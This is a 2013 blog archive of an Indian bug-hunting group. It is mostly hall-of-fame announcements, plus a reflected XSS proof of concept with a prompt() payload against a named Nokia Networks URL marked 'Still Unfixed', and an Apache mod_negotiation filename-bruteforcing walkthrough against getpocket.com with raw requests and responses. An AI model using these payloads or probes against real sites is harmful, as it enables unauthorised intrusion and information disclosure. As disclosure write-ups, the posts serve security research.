Kerala Cyber Squad - India: 2013

Tuesday, December 24, 2013

Reflected XSS on DotEasy WebHosting....

1) Goto DotEasy.com

2) Navigate to Web Mail Login on the top

and Insert your payload.

And hit Enter.

3) You should get a prompt like I got...

Geetz to ...KeralaCyberSquad-India...
www.Facebook.com/KeralaCyberSquad
sherin.real1@gmail.com

Monday, December 23, 2013

Nokia Solutions and Networks reflected XSS

Hello Geeks ,

Here is the POC of a Reflected XSS that I have found on Nokia Solutions and Network's domain https://rctool.access.nsn.com

[+] Vulnerable URL = https://rctool.access.nsn.com
[+] Vulnerable parameter = err
[+] Payload used = <SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] URL with malicious Payload= https://rctool.access.nsn.com/login.asp?login=false&err=<SCRIPT>+prompt("xssed by Praveen Nair");</SCRIPT>
[+] Reported
[+] Duplicated
[+] Still Unfixed

Praveen Nair
Kerala Cyber Squad - India

Sunday, December 22, 2013

Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example

Apache mod_negotiation filename bruteforcing ( file-name buster ) vulnerability with LIVE Example

Hey Ya Geeks ,,



Am Praveen Nair for Team Kerala Cyber Squad - India.

Today am going to share a less known File-Name bruteforcing ( File-name Buster ) Attack on Apache server , even though its risk level is low I found it interesting so thought of sharing it with you all, so lets go into it without wasting much time :)

[+] THINGS YOU GONNA NEED



#>> A TOOL TO INTERCEPT THE HEADER REQUEST AND RESPONSE ( LIKE BURP , LIVE HTTP HEADER .....ETC ETC )

#>> IMPORTANT THINGS >> GOOD EYES TO WATCH OUT FOR THE HOLES. :D

>> BRAIN TOO :p



[+] TARGET = Pocket's main-domain (i.e) http://getpocket.com/
[+] VULNERABILITY = Apache mod_negotiation filename bruteforcing vulnerability



#>> RISK :- INFORMATION DISCLOSURE ( LOW )



#>> WHAT ACTUALLY IS THIS ATTACK ??? \0_0/



The mod_negotiation is an Apache module responsible for selecting the document that best matches the clients capabilities, from one of several available documents. If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. This behavior can help an attacker to learn more about his target, for example, generate a list of base names, generate a list of interesting extensions, look for backup files and so on.

MultiViews is an Apache option which acts with the following rules:

If the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo., and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.

#>> HOW TO ATTACK / VERIFICATION AND RE-GENERATION ?? :N



It depends on several Accept headers in the client Request.

Accept

Accept-Language

Accept-Encoding

SO, Let's see how it actually works:

Turn on the INTERCEPTOR tool an stay connected.

The case is, Suppose If an attacker requests "index" without any extension through a HTTP Header Request :

All he have to do is just use http://site.com/index in the address bar and press enter (as here we have the target as http://getpocket.com/ ) lets see what have we got in the request header.

#>> HTTP Header Request :-

GET http://getpocket.com/index HTTP/1.1

Host: getpocket.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

and here focus on the Parameter" Accept" with value "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8" and as here we want / value of Accept parameter request we use a "Accept:" header with an existent mime type ( / ).

#>> HTTP Header Response :-

HTTP/1.1 200 OK

Content-Location: index.php

Content-Type: text/html; charset=UTF-8

Date: Fri, 04 Oct 2013 18:10:48 GMT

P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa OUR IND UNI COM NAV INT STA PRE"

Server: Apache

Set-Cookie: sess_guid=by5A1g73dR504Tb2fup4e11phRT8d332f40B54F617tjt7a56416dma8rd7WU171; expires=Sat, 30-Sep-2028 18:10:48 GMT; path=/; domain=getpocket.com

Set-Cookie: sess_start_time=1380910248; path=/; domain=.getpocket.com

TCN: choice

Vary: negotiate

x-frame-options: SAMEORIGIN

Transfer-Encoding: chunked

Connection: keep-alive

Now, it could be noticed that in the server response several interesting headers are out:

Content-Location: index.php

Vary: negotiate

TCN: choice

This means there is MultiViews enabled on / directory as it automatically selects the file index.php .

Let's see if in the request we use a "Accept:" header with an inexistent mime type ( test/hell ):



#>> HTTP Header Request :-

GET http://getpocket.com/index HTTP/1.1

Host: getpocket.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8

Accept: test/hell

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

#>> HTTP Header Response :-

HTTP/1.1 406 Not Acceptable

Alternates: {"index.php" 1 {type text/html}}

Content-Type: text/html; charset=iso-8859-1

Date: Fri, 04 Oct 2013 18:23:33 GMT

Server: Apache

TCN: list

Vary: negotiate

Content-Length: 410

Connection: keep-alive

#>> OUTPUT :-

   <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>406 Not Acceptable</title>

</head><body>

<h1>Not Acceptable</h1>

<p>An appropriate representation of the requested resource /index could not be found on this server.</p>

Available variants:

<ul>

<li><a href="index.php">index.php</a> , type text/html</li>

</ul>

<hr>

<address>Apache Server at getpocket.com Port 80</address>

</body></html>

woo! With a single request we get a listing of all the files! ;)

Well,yeah. Not really all the files but every file with the same name requested and with an extension listed in mime-types file.

This means that if index.whatever* is on the server it will be listed.

Similarly, The attacker can use any file name in place of "index" in this case so as a result can result in a filename bruteforcing with mod_negotiation an Apache module.

Hope This Tut was a lil bit informational to you all ,. :)

[+] This vulneability was reported to GetPocket Security Team, and as a result They rewarded me by adding my name in there Hall of Fame



Thanks for having a look at this post . :)

Please leave your comments below.

Praveen Nair ( c0d3 c0m4dr3 404 )
Team - Kerala Cyber Squad - India
./xit n 0ut

Friday, December 20, 2013

Got Listed on BitWall Security Researchers List

We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India's member ( Praveen Nair ) have Got listed in on BitWall Security Researchers List

http://www.bitwall.io/security

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Got listed in Nokia Solutions and Networks's Responsible Disclosure list

We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India have Got listed in Nokia Solutions and Networks's Responsible Disclosure list

http://nsn.com/responsible-disclosure

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Got listed in Androidfreeapp.net's Security Researcher list

We are proud to make you aware about one more achievement by our Team - Kerala Cyber Squad - India have Got listed in Androidfreeapp.net's Security Researchers list
http://www.androidfreeapp.net/security-researcher-acknowledgments/

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. :)

Got Listed on Telekom Security Aknowledegment List ( Second Time )

We are proud to make you aware about one more achivement by our Team - Kerala Cyber Squad - India's member( Praveen Nair with his mate Simone Memoli ) have Got Listed on Telekom Security Aknowledegment List

This is the second time Achivement by Kerala Cyber Squad India on Telekom.

http://www.telekom.com/security/acknowledgements

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Got Listed in MailChimp Security Incident Response Team List

We are proud to make you aware about one more achivement by our Team - Kerala Cyber Squad - India's member ( Praveen Nair ) Got Listed in MailChimp Security Incident Response Team List

http://mailchimp.com/about/security-response/

Greets to:- All members of Kerala Cyber Squad - India and all other Bug Hunters .. ;)

Thursday, December 19, 2013

Rackspace #Content_Spoofing Vulnerability..!!! (KeralaCyberSquad-India)

Rackspace #Content_Spoofing Vulnerability..!!! (KeralaCyberSquad-India)

Rackspace #Content_Spoofing Vulnerability...!!!

POC Reported by Swapnil Thaware....

Special thanks to Swapnil Thaware....

Sherin Panikar (KeralaCyberSquad-India)

Wednesday, December 18, 2013

Vulnerabilities @ Dropbox.

Vulnerability @ DropBox

Unsecure upload that can lead to xss and other vulnerabilities @ Dropbox.
(Watch in 360p or above for better quality)

Description:-
Status : Unfixed!
Reported : Dec 8,2013
Follow Up Reply : Dec 9,2013
Greetz to Evan Ricafort (Robinhood:0x00)
KeralaCyberSquad-India (Sherin Panikar aka HardNocks-HittnHard).

Saturday, December 14, 2013

LavaSoft Stored XSS

Hi Guys ,

Here is the POC for Stored XSS found on Lavasoft .

Reported On - 7th Dec. 2013
Got no reply and its fixed now .. :/

XSS on CV Maker's site

HI Guys ,

Today , Am going to present you a Stored XSS on CV Maker's Official website
( http://cvmkr.com/ )

Step 1 :
Go to https://cvmkr.com/CV/new

Step 2 :

Step 3 :

Step 4 :

Step 5 :

[+] Reported

[+] Acknowledged With a Certificate :)

Credits to : Praveen Nair

Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters

Got listed in Pinoy Hack New's Responsible Disclosure List ( TWICE )

We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India
Kerala Cyber Squad - India got listed in Pinoy Hack News' Responsible Disclosure List ( Twice )
http://www.pinoyhacknews.com/security

Credits to : Praveen Nair , Sherin Panikar

Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters

Tuesday, December 10, 2013

Got listed in Magix Security Acknowledgments List ( Twice )

We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India

Kerala Cyber Squad - India got listed in Magix's Security Acknowledgments List ( Twice )

http://research.magix.com/

Credits to : Praveen Nair , Sherin Panikar

Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters

Tuesday, November 26, 2013

Got listed in GetPocket Security Acknowledgments List ( Twice )

We are Proud to make you aware of Another Achievement by Team Kerala Cyber Squad - India

Kerala Cyber Squad - India got listed in GetPocket's Security Acknowledgments List ( Twice )

http://help.getpocket.com/customer/portal/articles/1225832-pocket-security-overview

Credits to : Praveen Nair , Sherin Panikar
Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug

Friday, November 22, 2013

Cross Site Scripting Attack ( XSS ) on Adobe's Main Domain

A Cross Site Scripting Attack ( XSS ) was reported on Adobe's Main Domain

[+] Proof Of Concept :-

[+] Reported

[+] Acknowledged to there Hall of Fames after 5 months :P

Credits to : Praveen Nair , Surya Subhash
Greets: To all Members and Supporters of Kerala Cyber Squad -India and all Bug Hunters a

Thursday, November 21, 2013

Got listed in Adobe Security Acknowledgments list ( Twice )

Kerala Cyber Squad - India have been listed in Adobe Security Acknowledgments list for Two times for reporting Cross Site Scripting Attack and some other Vulnerability,

http://www.adobe.com/support/security/bulletins/securityacknowledgments.html

Credits to :- Sherin Panikar , Praveen NAir , Surya Subhash

Greets to all members of Kerala Cyber Squad - India and all Bug Hunters :) (y)

Wednesday, November 20, 2013

Got listed in Telekom Security Acknowledgements List

Kerala Cyber Squad - India's Bug Hunter Got listed in Telekom Security Acknowledgements List for helping them in solving some Web Application Flaws on there domain.

http://www.telekom.com/security/acknowledgements

Credits to :- Sherin Panikar ( Co- Founder and a Young upcoming Security Researcher )

Greets to all members of Kerala Cyber Squad - India and all Bug Hunters :)

Monday, June 3, 2013

National Geographic Website Vulnerable to XSS Attack found by KeralaCyberSquad-India...

National Geographic , also commercially abbreviated and trademarked as Nat Geo, is an American subscription channel, that airs non-fiction television programs produced by the National Geographic Society and other production companies. Like History and the Discovery Channel, the channel features documentaries with factual content involving nature, science, culture, and history, plus some reality programming. The channel is owned primarily by Fox Cable Networks, a division of News Corporation.

And there Website was found Vulnerable to XSS (Cross Site Scripting) Attack.
The Vulnerablility was found and Reported by Cyber Security Researcher Group called
"KeralaCyberSquad-India".

"KeralaCyberSquad-India" is Operated from different states of India...

Click here to visit Facebook Page of KeralaCyberSquad-India

Thursday, May 23, 2013

IndiaToday Vulnerable to XSS Attack-found by M4s73rX0r (from KeralaCyberSquad-India).

The IndiaToday is an Indian English language weekly magazine. Established in 1975.
At present, India Today is published in Hindi, Telugu, Tamil and Malayalam. India Today International, an edition of the weekly news magazine, is circulated across the world.
And the Official Website of IndiaToday was found Vulnerable to XSS (Cross Site Scripting) Attack.
The Vulnerablility was found and Reported by Cyber Security Researcher Group called
"KeralaCyberSquad-India".

"KeralaCyberSquad-India" is Operated from different states of India...

Click here to visit Facebook Page of KeralaCyberSquad-India

OLX.IN Vulnerable To Cookie Disclosure Found By KCS - India

OLX offers free local classified ads in India. OLX is the next generation of free online classifieds. OLX provides a simple solution to the complications involved in selling, buying, trading, discussing, organizing, and meeting people near you.

Site Link: http://olx.in
Vulnerability: Cookie Disclosure
Vulnerability Found By: Kerala Cyber Squad - India
Status: Vuln. Reported To Admin
KCS - India Group On Fb : https://facebook.com/KeralaCyberSquad

Monster.com Vulnerable to XSS Attack found by Kerala Cyber Squad-India

Monster.com is one of the largest employment websites in the world, owned and operated by Monster Worldwide, Inc. Monster was one of the 20 most visited websites out of 100 million worldwide, according to comScore Media Metrics. It was created in 1999 by the merger of The Monster Board (TMB) and Online Career Center (OCC), which were two of the first and most popular career web sites on the Internet. Monster is primarily used to help those seeking work to find job openings that match their skills and location.
Today, Monster is the largest job search engine in the world. Monster has over a million job postings at any time and over 1 million resumes, in the database (2008) and over 63 million job seekers per month. The company employs approximately 5,000 employees in 36 countries.

The Most Visited JobPortal Site Monster...
And its found vulnerable to Cross-Site-Scripting (XSS) Attack.
The Vulnerablility was found by Cyber Security Researcher Group called "KeralaCyberSquad-India"
KeralaCyberSquad-India is Operated from different states of India...

Click to visit Facebook page of KeralaCyberSquad-India

Tata Group's Website Vulnerable to XSS Attack Found by Kerala Cyber Squad-India

Tata Group Indian Multinational Conglomerate Companies Website is Vulnerable to XSS Attack.
Vulnerability was found by Group of Computer Security Researchers
Known as "KeralaCyberSquad-India"
DOM BASED XSS IS FOUND ON TATA GROUP WEBSITE.
Kerala Cyber Squad - India , Group of Individuals Operating From Different Part of India...

Kerala Cyber Squad-India Facebook Page

Walmart Website Vulnerable to XSS Found By Kerala Cyber Squad-India

Wal-Mart Stores, Inc. branded as Walmart, is an American multinational retail corporation that runs chains of large discount department stores and warehouse stores. The company is the world's third largest public corporation, according to the Fortune Global 500 list in 2012, the biggest private employer in the world with over two million employees, and is the largest retailer in the world. Walmart remains a family-owned business, as the company is controlled by the Walton family, who own a 48 percent stake in Walmart.It is also one of the world's most valuable companies.

WalMart 's website is vulnerable to XSS - Cross Site Scripting Attack.
The vulnerability was found by computer security researchers group "KeralaCyberSquad-India".
KeralaCyberSquad-India is operated from different states of India...
The Vuln is reported successfully ...
KeralaCyberSquad-India Facebook Page